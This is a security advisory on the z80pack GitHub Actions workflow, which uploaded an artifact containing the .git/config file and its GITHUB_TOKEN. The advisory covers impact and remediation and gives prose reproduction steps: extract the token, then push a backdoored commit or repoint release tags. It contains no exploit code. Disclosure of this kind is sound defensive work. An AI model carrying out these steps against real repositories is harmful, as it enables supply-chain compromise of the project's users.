z80pack GitHub Actions Workflow GITHUB_TOKEN Exposure Vulnerability

A vulnerability exists in the z80pack GitHub repository within the GitHub Actions workflow file 'makefile-ubuntu.yml', all versions prior to the fix. The issue arises because the workflow uploads an artifact that includes the '.git/config' file, which contains the GITHUB_TOKEN. This token can be extracted and misused with the GitHub API, potentially allowing an attacker to push malicious code or alter release commits in the repository.

Impact

Exploitation of this vulnerability allows for unauthorized use of the GITHUB_TOKEN, enabling an attacker to inject malicious code into the repository or manipulate release commits. This could lead to the distribution of compromised code to users.

Reproduction

To reproduce this vulnerability, trigger a workflow run that uses the 'makefile-ubuntu.yml' file. Once the artifact is available for download, extract the GITHUB_TOKEN from the '.git/config' file included in the artifact. This token can then be used with the GitHub API to push a backdoored commit to the repository's master branch or to update release tags to point to the compromised commit.

Remediation

The vulnerability has been addressed by modifying the 'makefile-ubuntu.yml' workflow to exclude the '.git/config' file from the uploaded artifact. Users should ensure they are using the latest version of the workflow.